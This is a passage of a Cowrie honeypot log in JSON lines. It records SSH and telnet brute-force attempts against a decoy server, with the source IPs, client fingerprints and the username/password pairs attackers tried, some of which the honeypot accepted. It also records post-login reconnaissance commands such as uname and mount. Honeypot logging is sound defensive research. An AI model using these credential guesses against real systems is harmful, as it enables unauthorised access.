om","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:09:40.130215Z","src_ip":"212.227.235.229","session":"87fe467106d1"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qaz@Wsx","message":"login attempt [root/!Qaz@Wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:09:40.277874Z","src_ip":"212.227.125.160","session":"948a4c237a06"}
{"eventid":"cowrie.login.failed","username":"server","password":"password","message":"login attempt [server/password] failed","sensor":"my-vps","timestamp":"2025-08-31T05:09:41.087270Z","src_ip":"212.227.235.229","session":"f231c5c5daa8"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora","message":"login attempt [aurora/aurora] failed","sensor":"my-vps","timestamp":"2025-08-31T05:09:41.145238Z","src_ip":"212.227.235.229","session":"87fe467106d1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:09:42.390954Z","src_ip":"212.227.235.229","session":"87fe467106d1"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:09:43.011570Z","src_ip":"212.227.235.229","session":"f231c5c5daa8"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qaz@Wsx","message":"login attempt [root/!Qaz@Wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:09:44.629589Z","src_ip":"212.227.235.229","session":"fd4077e7c201"}
{"eventid":"cowrie.session.connect","src_ip":"74.82.47.5","src_port":24448,"dst_ip":"1.2.3.4","dst_port":22,"session":"46718ce751d9","protocol":"ssh","message":"New connection: 74.82.47.5:24448 (1.2.3.4:22) [session: 46718ce751d9]","sensor":"my-vps","timestamp":"2025-08-31T05:09:45.325397Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-31T05:09:45.326356Z","src_ip":"74.82.47.5","session":"46718ce751d9"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:09:45.327613Z","src_ip":"74.82.47.5","session":"46718ce751d9"}
{"eventid":"cowrie.session.closed","duration":120.00200748443604,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:09:47.890182Z","src_ip":"212.227.235.229","session":"7c4ecea3424c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48584,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b23f43fc96b","protocol":"ssh","message":"New connection: 212.227.235.229:48584 (1.2.3.4:22) [session: 9b23f43fc96b]","sensor":"my-vps","timestamp":"2025-08-31T05:09:48.223842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:09:48.225496Z","src_ip":"212.227.235.229","session":"9b23f43fc96b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:09:48.483209Z","src_ip":"212.227.235.229","session":"9b23f43fc96b"}
{"eventid":"cowrie.login.failed","username":"zgr","password":"zgr","message":"login attempt [zgr/zgr] failed","sensor":"my-vps","timestamp":"2025-08-31T05:09:49.491146Z","src_ip":"212.227.235.229","session":"9b23f43fc96b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:09:50.743115Z","src_ip":"212.227.235.229","session":"9b23f43fc96b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:09:54.019827Z","src_ip":"212.227.125.160","session":"948a4c237a06"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:09:54.020533Z","src_ip":"212.227.125.160","session":"948a4c237a06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35628,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c4d354ec053","protocol":"ssh","message":"New connection: 212.227.125.160:35628 (1.2.3.4:22) [session: 4c4d354ec053]","sensor":"my-vps","timestamp":"2025-08-31T05:09:55.531422Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40042,"dst_ip":"1.2.3.4","dst_port":22,"session":"84823e3cddf8","protocol":"ssh","message":"New connection: 212.227.235.229:40042 (1.2.3.4:22) [session: 84823e3cddf8]","sensor":"my-vps","timestamp":"2025-08-31T05:09:55.736275Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:09:56.056905Z","src_ip":"212.227.125.160","session":"4c4d354ec053"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:09:56.057642Z","src_ip":"212.227.125.160","session":"4c4d354ec053"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:09:56.119322Z","src_ip":"212.227.235.229","session":"fd4077e7c201"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:09:56.120048Z","src_ip":"212.227.235.229","session":"fd4077e7c201"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54984,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fbac18ad685","protocol":"ssh","message":"New connection: 212.227.125.160:54984 (1.2.3.4:22) [session: 3fbac18ad685]","sensor":"my-vps","timestamp":"2025-08-31T05:09:57.977494Z"}
{"eventid":"cowrie.login.failed","username":"server","password":"password","message":"login attempt [server/password] failed","sensor":"my-vps","timestamp":"2025-08-31T05:09:58.069456Z","src_ip":"212.227.125.160","session":"4c4d354ec053"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:09:58.814065Z","src_ip":"212.227.125.160","session":"3fbac18ad685"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:09:58.814886Z","src_ip":"212.227.125.160","session":"3fbac18ad685"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"5.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:09:59.209512Z","src_ip":"212.227.125.160","session":"948a4c237a06"}
{"eventid":"cowrie.session.closed","duration":"122.0","message":"Connection lost after 122.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:09:59.210580Z","src_ip":"212.227.125.160","session":"948a4c237a06"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:09:59.542822Z","src_ip":"212.227.125.160","session":"4c4d354ec053"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:10:02.491998Z","src_ip":"212.227.235.229","session":"84823e3cddf8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:10:02.492811Z","src_ip":"212.227.235.229","session":"84823e3cddf8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"6.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:02.885947Z","src_ip":"212.227.235.229","session":"fd4077e7c201"}
{"eventid":"cowrie.session.closed","duration":"98.9","message":"Connection lost after 98.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:02.887661Z","src_ip":"212.227.235.229","session":"fd4077e7c201"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50032,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b5b65f721ec","protocol":"ssh","message":"New connection: 217.72.205.35:50032 (1.2.3.4:22) [session: 4b5b65f721ec]","sensor":"my-vps","timestamp":"2025-08-31T05:10:02.932128Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:02.933569Z","src_ip":"217.72.205.35","session":"4b5b65f721ec"}
{"eventid":"cowrie.login.success","username":"root","password":"AR2019","message":"login attempt [root/AR2019] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:10:04.054065Z","src_ip":"212.227.125.160","session":"3fbac18ad685"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:10:07.218502Z","src_ip":"212.227.125.160","session":"3fbac18ad685"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T05:10:07.219248Z","src_ip":"212.227.125.160","session":"3fbac18ad685"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42992,"dst_ip":"1.2.3.4","dst_port":22,"session":"a238117d19af","protocol":"ssh","message":"New connection: 212.227.235.229:42992 (1.2.3.4:22) [session: a238117d19af]","sensor":"my-vps","timestamp":"2025-08-31T05:10:08.030604Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:10:08.031614Z","src_ip":"212.227.235.229","session":"a238117d19af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:10:08.290123Z","src_ip":"212.227.235.229","session":"a238117d19af"}
{"eventid":"cowrie.login.failed","username":"kodi","password":"123","message":"login attempt [kodi/123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:10:09.381275Z","src_ip":"212.227.235.229","session":"a238117d19af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"2.4","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:09.647980Z","src_ip":"212.227.125.160","session":"3fbac18ad685"}
{"eventid":"cowrie.session.closed","duration":"11.7","message":"Connection lost after 11.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:09.649448Z","src_ip":"212.227.125.160","session":"3fbac18ad685"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:10.642649Z","src_ip":"212.227.235.229","session":"a238117d19af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42126,"dst_ip":"1.2.3.4","dst_port":22,"session":"49e3b30bf1dc","protocol":"ssh","message":"New connection: 212.227.235.229:42126 (1.2.3.4:22) [session: 49e3b30bf1dc]","sensor":"my-vps","timestamp":"2025-08-31T05:10:13.231525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:10:13.232766Z","src_ip":"212.227.235.229","session":"49e3b30bf1dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:10:13.504300Z","src_ip":"212.227.235.229","session":"49e3b30bf1dc"}
{"eventid":"cowrie.login.failed","username":"update","password":"update123","message":"login attempt [update/update123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:10:14.633153Z","src_ip":"212.227.235.229","session":"49e3b30bf1dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":15584,"dst_ip":"1.2.3.4","dst_port":22,"session":"617e86110605","protocol":"ssh","message":"New connection: 212.227.125.160:15584 (1.2.3.4:22) [session: 617e86110605]","sensor":"my-vps","timestamp":"2025-08-31T05:10:15.068496Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-31T05:10:15.069189Z","src_ip":"212.227.125.160","session":"617e86110605"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:15.070060Z","src_ip":"212.227.125.160","session":"617e86110605"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":54868,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd26fdedac96","protocol":"ssh","message":"New connection: 201.148.180.50:54868 (1.2.3.4:22) [session: cd26fdedac96]","sensor":"my-vps","timestamp":"2025-08-31T05:10:15.771809Z"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:15.907176Z","src_ip":"212.227.235.229","session":"49e3b30bf1dc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:10:17.524112Z","src_ip":"201.148.180.50","session":"cd26fdedac96"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:10:17.525107Z","src_ip":"201.148.180.50","session":"cd26fdedac96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51752,"dst_ip":"1.2.3.4","dst_port":23,"session":"8e0f9df3bcb9","protocol":"telnet","message":"New connection: 212.227.235.229:51752 (1.2.3.4:23) [session: 8e0f9df3bcb9]","sensor":"my-vps","timestamp":"2025-08-31T05:10:18.540117Z"}
{"eventid":"cowrie.login.success","username":"root","password":"AR2019","message":"login attempt [root/AR2019] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:10:22.919646Z","src_ip":"201.148.180.50","session":"cd26fdedac96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:10:25.545830Z","src_ip":"201.148.180.50","session":"cd26fdedac96"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T05:10:25.546557Z","src_ip":"201.148.180.50","session":"cd26fdedac96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45258,"dst_ip":"1.2.3.4","dst_port":22,"session":"668d9f546cf2","protocol":"ssh","message":"New connection: 212.227.235.229:45258 (1.2.3.4:22) [session: 668d9f546cf2]","sensor":"my-vps","timestamp":"2025-08-31T05:10:26.327633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:10:26.328545Z","src_ip":"212.227.235.229","session":"668d9f546cf2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-